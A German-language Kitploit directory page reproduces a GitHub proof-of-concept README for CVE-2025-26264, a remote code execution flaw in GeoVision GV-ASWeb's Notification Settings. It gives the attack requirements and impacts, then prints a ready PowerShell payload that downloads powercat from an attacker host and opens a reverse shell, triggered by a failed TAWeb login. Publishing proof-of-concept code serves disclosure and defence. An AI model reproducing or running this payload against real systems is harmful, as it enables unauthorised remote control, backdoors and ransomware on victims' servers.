Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-26264 — CVE-2025-26264 – GeoVision GV-ASWeb mit der Version 6.1.2.0 oder niedriger enthält eine Schwachstelle zur Remote-Codeausführung (RCE) in der Funktion „Notification Settings“. Ein authentifizierter Angreifer mit „System Settings“-Berechtigungen in ASWeb kann diesen Fehler ausnutzen, um beliebige Befehle auf dem Server auszuführen, was zu einer vollständigen Kompromittierung des Systems führt. | Kitploit
Tools/GitHubGitHub/hxlxmj/cve-2025-26264
SchwachstellenanalyseExploitationLaterale BewegungWebanwendungs-ExploitationPenetrationstestsRed Teaming
GitHubhxlxmj/cve-2025-26264

CVE-2025-26264

Repository anzeigen
Webseite
15vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →

Über

CVE-2025-26264 – GeoVision GV-ASWeb mit der Version 6.1.2.0 oder niedriger enthält eine Schwachstelle zur Remote-Codeausführung (RCE) in der Funktion „Notification Settings“. Ein authentifizierter Angreifer mit „System Settings“-Berechtigungen in ASWeb kann diesen Fehler ausnutzen, um beliebige Befehle auf dem Server auszuführen, was zu einer vollständigen Kompromittierung des Systems führt.

Teilen

CVE-2025-26264

CVE-2025-26264 - GeoVision GV-ASWeb in Version 6.1.2.0 oder niedriger enthält eine Remote Code Execution (RCE)-Schwachstelle in seiner Funktion Notification Settings. Ein authentifizierter Angreifer mit "System Settings"-Berechtigungen in ASWeb kann diesen Fehler ausnutzen, um beliebige Befehle auf dem Server auszuführen, was zu einer vollständigen Systemkompromittierung führt.

Anforderungen

Für einen erfolgreichen Angriff benötigt ein Angreifer:

  • Netzwerkzugriff auf die GV-ASManager-Webanwendung mit Version 6.1.2.0 oder niedriger;
  • Zugriff auf ein Konto mit der Berechtigung, die Funktion Notification Settings zu verwalten.

Auswirkungen

Die Schwachstelle kann genutzt werden, um die folgenden unbefugten Aktionen durchzuführen:

  • Ein Konto mit der Berechtigung, die Funktion Notification Settings zu verwalten, ist in der Lage:
    • Einen Remote Code Execution-Angriff durchzuführen.
  • Nach dem erfolgreichen Angriff wird ein Angreifer in der Lage sein:
    • Auf vertrauliche Systeminformationen zuzugreifen, diese zu ändern oder zu löschen;
    • Eine Backdoor auf dem System zu installieren;
    • Einen Ransomware-Angriff durchzuführen;
    • Lateral Movement im internen Netzwerk durchzuführen.

CVE-2025-26264 PoC [Test von GeoVision v6.1.2.0]

Die Ausnutzung der Remote Code Execution-Schwachstelle in der ASWeb-Plattform von GeoVision GV-ASManager ist gegen Versionen 6.1.2.0 oder niedriger möglich (Stand: 26. Februar 2025 gibt es keinen Fix).

Die ASWeb-Funktion Notification Setting von GeoVision ASManager ist anfällig für RCE

HTTP-Anfrage zum Einrichten einer Benachrichtigung für ein bestimmtes Ereignis: Fehlgeschlagener TAWeb-Anmeldeversuch

powershell.exe Set-ExecutionPolicy Bypass -Force;IEX(New-Object System.Net.WebClient).DownloadString('http://LHOST/powercat.ps1');powercat -c LHOST -p LPORT -e powershell

Ein fehlgeschlagener Authentifizierungsversuch in TAWeb

Host des Opfers: Das Skript öffnet eine Backdoor zum Host des Angreifers.

Host des Angreifers: Ein Angreifer erhält die Shell

Kontakt

Wenn Sie eine Frage haben, können Sie mich auf LinkedIn kontaktieren: Giorgi Dograshvili.

Tool herunterladen